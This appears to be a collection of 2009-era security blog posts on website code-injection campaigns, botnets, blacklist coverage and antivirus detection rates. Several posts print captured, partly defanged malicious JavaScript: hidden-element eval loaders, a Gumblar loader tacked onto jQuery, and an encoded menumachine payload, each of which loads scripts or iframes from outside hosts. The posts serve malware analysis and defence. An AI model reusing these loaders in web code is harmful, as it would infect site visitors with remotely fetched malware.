“Spain Busts Hackers for Infecting 13 Million PCs”

• Reuters via Threat Level | Wired.com

Users were targeted via a vulnerability in Internet Explorer when they visited websites infected with the malware. Spanish authorities shutdown the Mariposa bot-net on December 23, 2009 although the details of what is being called the “largest cyber-raid to date” are just being released.

Infection Statistics:

• 190 countries
• 40 of the largest financial institutions
• 50% of 1,000 largest companies

News, Security bot-net, credit card, Internet Explorer, malicious websites, malware, Mariposa, raid, Security

Code injection attacks show no signs of abating. Everyday more than 6000 new websites are added to Google’s Safe Browsing List (blacklist). Hackers are compromising websites without the knowledge of the website owner to, in turn, infect website visitors.

Malicious hackers don’t care if the website they infect is a small mom and pop operation or a large e-business. They use automated “bots” in most cases, which will attack any and every website they can exploit. No website is off limits.

As an example of the rampant nature of this problem, we will show how we found over 3000 infected websites out of which only a small percentage seems to be blacklisted by current website reputation services. One of the most reliable reputation services, offered by Google, only managed to identify a small portion of the whole of the infected websites we mined using Google’s own search results. Identifying infected websites is not trivial.

We recently saw a strong rise in the appearance of the malicious code below:

this.v="";:LineMixer [var i=15492;var y=window;var  o='';var op='';
var a='s*c*r:iVpTt:'.replace(/[\:

TVJ\*]/g, '');var  yx=new Array();
var u='c*r*eja_tjeYE_lYe*mYebn*t_'.replace(/[_\*bjY]/g,  '');
var _=new Array();this.nt="";]var k;if(k!='dh' && k !=  '')
{k=null};y.onload=function(){var w;if(w!='' &&  w!='ns'){w=null};
try {this.n_=false;uh=document[u](a);var ow="";var  f="";
var xl=new String();var xf="xf";:LineMixer  [uh['s;rpcp'.replace(/[p;t6O]/g, '')]
='hHt4tVp4:5/V/4e4x4aHmViVnVe4

By searching for a small part of the above portion of this code on Google (shown below), we found a list of websites which harbor the above code. A simple mention of this code on the pages of a website does not necessarily imply that the website is bad. It could be that a website administrator was asking for clarification on help forum. However, a detailed (automated) examination is performed by our systems to remove any doubt.

this.v="";:LineMixer [var i=

Interestingly, only 5.7% of the 3000+ infected sites we found exploited with this code were blacklisted by Google. This highlights the fact that even reliable blacklists, like the Google’s Safe Browsing List are not complete.

Till next time.
Read more…

Report, Security blacklisted websites, code injection, infected sites, malicious websites

This afternoon, a post on Badwarebusters.org reminded me of a somewhat interesting piece of malicious code I have not seen for some time. Our scanners flagged it as malware.

The original post is found here , answered by redleg on Badwarebusters.org.

This malware, found embedded in “eslpod.com/website/index.php”, is displayed below. The code has been slightly modified so as not to work as intended if loaded up and run in a browser.

<h4 id="Fl" style="display:none;">%64%6f%63%75%6d%65%6e%74%2e%77%72%74%65%28%22%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%22%68%74%74%70%3a%2f%2f%74%72%61%66%2e%74%72%61%6e%73%63%6f%6e%74%69%6e%65%6e%74%61%6c%2d%73%65%72%76%69%63%65%2e%67%2f%69%6e%64%65%78%2e%70%68%70%5c%22%20%73%74%79%6c%65%3d%5c%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%5c%22%3e%3c%2f%69%66%72%61%6d%65%3e%22%29%3b</h4>

<script>
ar aK=docume nt.getElem entById("Fl"), A x=ev al;
aK = aK.inne rHTML;
Ax(unescape(aK));
</script>

It is interesting to see how hackers are trying out new tricks to fool scanning systems. Most code-injection attacks deliver the payload directly within the script tags. Here, the case is slightly different. The individual has attempted to disguise the malicious payload as a simple web element inside the page by using Javascript and the getElementById function. The code then proceeds to execute the malicious payload.

The payload by itself is not so interesting. It has been known to appear in different variants before this particular example.

The payload is displayed below:

document.wri te("<ifra me src=\"hxxp://traff.tr anscon tin enta l-serv ice.org/i n dex.php\" style=\"dis play:none;\"></ifr me>");

The iframe referred to here refers to the following:

<!--LiveInternet counter-->
<script t ype="text/javascript">
<!--
document.write("<a href='hxxp://www.li veinte rnet.ru/click' "+
"target=_blank><img src='hxxp://cou nter.yad ro.ru/hit?t52.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+"' alt='' title='LiveInternet: ïîêàçàíî ÷èñëî ïðîñìîòðîâ è"+
" ïîñåòèòåëåé çà 24 ÷àñà' "+"border='0' width='88' height='31'><\/a>")
//-->
</script>
<!--/LiveInternet-->

This snippet should be flagged by many scanning services simply because of the reputation of the sites mentioned inside it (see Malware Patrol).

Till next time, surf safe.

Report, Security code injection, iframe, malicious websites

An Autonomous Systems or AS is a routing construct that represents a group of networks under the control of an organization (credit for edit :Max@badwarebusters.org). These form the “structure” of the Internet. These organizations can be thought of as web-hosting companies, large Internet-based companies or resellers of bandwidth and IP addresses. These are usually large organizations for whom simply getting an Internet connection and hosting a company for their website is not enough.

In recent months, the trend of benign websites being affected by code injection clearly show that attacks to inject malware into unsuspecting websites is on the rise. It is important to understand the profile of the ASes which are actually providing transit to infected websites hosted within their systems. Since each AS provides bandwidth and resources supporting the downloading of malware to computers which belong to unsuspecting visitors of a compromised website. ASes, more specifically hosting companies and other network operators (rather than ASes) should play a pivotal role in addressing compromised websites.

At StopTheHacker.com, we have conducted extensive experiments to analyze and profile over 20,000 ASes to identify which ASes are the worst offenders in terms of hosting Blacklisted websites.  We have used Google safebrowsing data, also accessible via StopBadware.org, (which sources data from Google and Sunbelt)to identify and trend which ASes are responsible for the proliferation of badware on the Internet. We have correlated AS size with data available from CAIDA to determine whether larger ASes are more at fault or not.

We present some brief results below:

1. The average percentage of blacklisted websites in
   • Top 10 ASes (according to number of sites noted by Google) is 3.5%
   • ASes with Ranks 11-23 (according to number of sites noted by Google) is 3.75%
   • ASes with Ranks 24-40 (according to number of sites noted by Google) is 5.01%
2. The AS with the highest percentage of blacklisted sites, is AS 16557 (Colo Solutions, Inc.), with close to 60% of 10,000 sites blacklisted.
3. The Top 50 ASes, which host more than 10,000 sites each and have at least 6% of websites blacklisted, host 151,000 blacklisted sites, combined.

Interesting observations:

1. AS 16557 (Colo Solutions, Inc.), is well known for popping up on blacklists related to peer-to-peer networks [Is someone tracking P2P users]. It seems that this AS, which is not really concerned about P2P traffic emanating from within its systems, traffic which is potentially used to exchange copyrighted material, is also not interested in paying attention to malware infected websites hosted within its networks.
2. AS 15169 (Google Inc.), had 590734 sites analyzed and 6046 of them were found to contain malware.
3. AS 14173 (Photobucket), had zero sites infected out of 399424 sites analyzed.
4. The Largest AS (Level 3 Communications) according to connection degree, see CAIDA’s AS listing, was hosting 571 infected sites out of 136305 sites analyzed by Google.
5. AS 7018 (AT&T), was hosting 97 infected sites out of 7947 sites analyzed by Google.
6. AS 701 (Verizon), was hosting 117 infected sites out of 7248 sites analyzed by Google.
7. AS 1239 (Sprint), was hosting 117 infected sites out of 3958 sites analyzed by Google.

Making Sense of the Results

Below we present some graphs to highlight the percentage of blacklisted websites hosted by the top few ASes. Note that all AS rankings below are based on the number of websites analyzed by Google. An AS with rank 1 hosts more websites, analyzed by Google than an AS with rank 2.

Nearly 50 ASes host at least 600 blacklisted sites each

Top 10 ASes host lage percentages of blacklisted sites

Read more…

News, Report, Security AS, google, injection, malicious websites

AV Engines are not very effective at spotting web-based malware

There is every indication from sources internal to StopTheHacker.com and external sources comprised of web hosting companies, administrators, security companies and government organizations that the threat from web based malware is looming large and is only going to intensify in the coming years.

Website owners, and administrators, even website hosting companies are the directly affected ones. However, it is me and you, the web surfer, who visits supposedly benign sites which have been compromised by malicious individuals who are at great risk.

To protect the client, i.e. you, security experts rightly recommend antivirus (AV). These AVs are good at detecting pieces of code which have been classified and adhere to well known malicious behavior.  Consumers need to know that most of these AV engines are not tuned to detect web-based malware threats.

Below we present a small test we performed consisting of 159 unique pieces of web-based malware captured during the last few weeks by our detection systems. We compared four popular AV engines and found that none of them are very effective at detecting malware from compromised websites.

Note that all AV engines used were at the latest version available for our systems and were updates with the latest virus definitions. All samples used Javascript to execute their malicious content.

Brief highlights:
1. AV engines used: AVG, ClamAV, F-prot, Avast
2. None of the AV engines detected more than 11% of the malicious samples
3. AVG detected: 6.92%, ClamAV detected: 10.69%, F-prot detected: 10.06%, Avast detected: 2.52% of the samples respectively
4. Only one sample was detected by all four AV engines. This sample was extremely similar to a POC exploit code from milw0rm.com

This limited experiment shows that traditional AV engines have a long way to go when it comes to detecting web-based malware. Jaal uses proprietary detection technology which is based on artificial intelligence and machine learning algorithms which can understand how malicious pieces of code behave and profile and classify them with high accuracy and recall.
Read more…

News, Report, Security anti virus, injection, malicious websites, Security, suspicious code

Building on with this series of posts, which try to capture the evolution of how hackers are injecting benign scripts with malware in the hopes of hiding their malicious content amongst good code. The malicious code displayed this time leads to the famous “Gumblar” infection strain and can cause a lot of headaches. This particular strain is not new, but has been resurfacing in the last few weeks and hence the focus on this specific piece.

This particular example shows how a jQuery script was used by a hacker to spread malicious code. This example is a little obfuscated. This code was mined from www.i-movix.com/en/distributors/.

On line 15 you can find:

<scri pt type="text/javas cript" src="/plugins/system/ jceutilities/js/jqu ery-126.js">

Which loads the example below:

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 2008-05-24 14:22:17 -0400 (Sat, 24 May 2008) $
* $Rev: 5685 $
*/
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)
>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while
(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1}

**code removed for brevity**

while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(H
(){J w=1b.4M,3m$=1b.$;J D=1b.4M=1b.$=H(a,b){I 2B D.17.5j(a,b)};J u=/^[^<]*(<(.|\\s
)+>)[^>]*$|^#(\\w+)$/,62=/^.[^:#\\[\\.]*$/,12;D.17=D.44={5j:H(d,b){d=d||S;G(d.16){

**malicious code**

/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement
('scri pt');H3qqe 3ur6p.setAttribute('type', 'text/javascript');H3qqea3ur6p.setAttribute
('id', 'myscript1');H3qqea3ur6p.setAttribute('src',  'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v(
)@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$
)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@
0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(
m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##
)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a
&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|
\$/ig, ''));H3 qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea
3ur6p);}} cat h(e) {}

Till next time…

Security injection, malicious websites, script, suspicious code

We have received significant requests to keep up with this series of posts which try to capture the evolution of how hackers are injecting benign scripts with malware in the hopes of hiding their malicious content amongst good code.

This particular example shows how a menumachine script was used by a hacker to spread malicious code. This example is a little bit different from the ones we have posted before as it does not just post the malicious code using a straight iframe or obviously understandable JavaScript. This example shows how hackers are trying just a little bit harder to inject code that is somewhat obfuscated. This code was mined from www.rvp1875.com/index.html. Take a look at the example below.

/* menumachine.js v1.7.1.1 - a component of MenuMachine (c)2004 Big Bang Software Pty Ltd :: menumachine.com*/

_ud="undefined";

if(typeof(bbMenu)==_ud)
  bbMenu=new Array();

bb_fix=new Array();

function _bbroot(bbL,name,r2L,clkOp,hRelPos,vRelPos,hRPmargin,vRPmargin,smScr,scrSp,scrAm,tri,triDn,triL,t_Hr,s_Hr,fade,posID,s_bCol,s_bW,s_bBtw,s_fFam,s_fSz,s_fWt,s_fStl,s_txAl,s_lPad,s_tPad,hOL,vOL,sArr,bCol,bw,bBtw,fFam,fSz,fWt,fStl,txAl,lPad,tPad,top_vOL,top_hOL,tArr,spc,nhlP,bUp,s_ao,ao)
{
  if(typeof(__pg)==_ud)
  {
    _b=new __bbBrChk();
    _hr=null;

    if(_b.ieDom&&!_b.mac){
      var els=document.getElementsByTagName("base");

      if(els.length){
        _hr=els[0].getAttribute("href");
      }
    }

    if(!_hr)
      _hr="";

    __pg=new _bbPg();

**code removed for brevity**

    for(var g=0;g<bbMenu.length;g++)
      bbMenu[g].off();
  }

  __bbMmB=1;
  _bbUld();
}

function _bbPg()
{
  var t=this;
  t.wn=window;
  t.d=t.wn.document;
  t.w=(_b.dt&&_b.ie)?t.d.documentElement.clientWidth:_b.ie||_b.nsDom?t.d.body.clientWidth:t.wn.innerWidth;
  t.h=(_b.dt&&_b.ie)?t.d.documentElement.clientHeight:_b.ie||_b.nsDom?t.d.body.clientHeight:t.wn.innerHeight;
  t.wn.onresize=_b.n4?_bbRzevt:_bbRePo;
}

**malicious code**

<!--
(function(hVAxp){var v120='va@72@20a@3d@22@53@63ript@45ngine@22@2c@62@
3d@22Ve@72@73i@6fn@28)+@22@2c@6a@3d@22@22@2cu@3d@6eavig@61tor@2euse@72A
ge@6et@3b@69@66((@75@2e@69n@64exOf(@22Chrome@22)@3c0)@26@26(u@2ei@6edexO
@66@28@22@57in@22@29@3e0)@26@26@28@75@2e@69@6edexO@66(@22NT@20@36@22)@3c
0)@26@26(@64o@63u@6dent@2ecoo@6b@69e@2eind@65@78Of(@22mi@65k@3d1@22)@3c@
30)@26@26(ty@70eof(@7arv@7at@73)@21@3dt@79@70e@6ff(@22A@22@29))@7bzrvzts
@3d@22@41@22@3beval(@22if@28wi@6ed@6fw@2e@22+a@2b@22)j@3dj+@22+@61+@22M@
61jor@22@2bb+a+@22Mi@6eor@22@2bb@2ba@2b@22Bu@69@6c@64@22+@62@2b@22j@3b@2
2)@3b@64ocume@6et@2ewrit@65(@22@3cscri@70t@20src@3d@2f@2fm@61rt@22@2b@22
@75@7a@2ec@6e@2fvid@2f@3fi@64@3d@22+j+@22@3e@3c@5c@2fs@63@72i@70t@3e@22)
@3b@7d';var Id4=v120.re lace(h Axp,'%');var gIl=unes cape(Id4);eval(gIl)}
)(/\@/g);
-->

Till next time..

Security injection, malicious websites, script, suspicious code

You might remember the article I wrote a couple of weeks back regarding the then recently found vulnerabilities of SSL 3.0 (TLS 1.0). Well, things just got real.

• New Security Issues come to light with SSL 3.0

At the time, some researchers even went so far as to say that the vulnerability was only theoretical! Too theoretical to even worry about. The attack is described in detail:

• TLS renegotiation vulnerability (CVE-2009-3555)

It appears that the popular micro-blogging site Twitter first fell victim to the attack. The Register has the full story:

• Researcher busts into Twitter via SSL reneg hole

Now that the attack is in the wild, where are the patches?
Read more…

News, Security CSRF, https, malicious websites, man in the middle, MITM, SSL, TLS

Researchers at VUPEN have discovered four major vulnerabilities and one minor in the Adobe Shockwave Player. The vulnerabilities are present in version 11.5.1.601 and those predating it. Adobe Shockwave is installed on over 450 million client systems world-wide.

The most problematic of the vulnerabilities can be exploited to execute arbitrary commands when a visitor views a malicious web page. Three of the vulnerabilities can be exploited to trick a user into visiting a malicious website. The vulnerability least at issue here is a possible denial of service to the Shockwave application caused by a faulty boundary condition.

When you put together the individual vulnerabilities, you can see that the exploitation of these issues is a one-two punch. First, a user can be redirected to a malicious web page where Shockwave will execute arbitrary code. These vulnerabilities affect all browsers, including Internet Explorer and Firefox. Adobe recommends updating Shockwave to their latest version, 11.5.1.602, or higher.

Yet another reason that website administrators should invest in regular website scanning to discover malicious content that may be attacking their visitors.

Vulnerability Details:

• Adobe Security Bulletin
• VUPEN Security

News, Security adobe, arbitrary code execution, denial of service, malicious websites, shockwave

New SSL Security Issues: A vulnerability allowing hijacking of an already connected SSL 3.0 (TLS 1.0) sessions has been disclosed.

SSL technology provides an end-to-end secure communications tunnel used most commonly by the HTTPS protocol. This, most recent, vulnerability allows an attacker to insert text of their choice into the data-stream, even after the secure handshake has occurred. This is another security gap created by the standard’s renegotiation process that is intended to allow a new SSL connection to be established over an already connected SSL session.

SSL renegotiation is most useful in the following situations: when client authentication is required, to use a different set of encryption and decryption keys, or when the server wants to switch encryption or hashing algorithms. For now, some patches have been made available that disable this functionality completely in order to avoid the vulnerability.

It will probably be a few weeks until patches including a reworked renegotiation mechanism appear. Most importantly, a fix has been in the works (by most browser vendors) but it won’t be out until the respective vendors finish their work. So, don’t depend on SSL until your browser is patched.

More Information:

• Another Protocol Bites The Dust
• Renegotiating TLS
• MITM attack on delayed TLS-client auth through renegotiation

News, Security https, malicious websites, man in the middle, SSL, TLS